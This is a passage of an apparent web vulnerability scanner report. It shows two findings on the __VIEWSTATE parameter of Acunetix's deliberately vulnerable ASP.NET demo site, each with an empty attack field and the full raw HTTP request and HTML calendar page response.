how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8259&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAkZn1e9oIZGRkZhqLX6nTjp8%2FRkJPEtTPpIRuihg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU7ou5CwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Dkd4O4aIHhHHw%2FBcMPiXtpuX%2BZmE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:01 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAkZn1e9oIZGRkZhqLX6nTjp8/RkJPEtTPpIRuihg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU7ou5CwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Dkd4O4aIHhHHw/BcMPiXtpuX+ZmE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:White" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8247&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAnJyHctoIZGRk7Bi%2BqajZhXjzVFO97%2BLMq4otuo8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0oaytAgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DFPpmO%2Bm4uwO9isHpETARFXDfMTo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:47 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAnJyHctoIZGRk7Bi+qajZhXjzVFO97+LMq4otuo8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0oaytAgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DFPpmO+m4uwO9isHpETARFXDfMTo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:White" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site 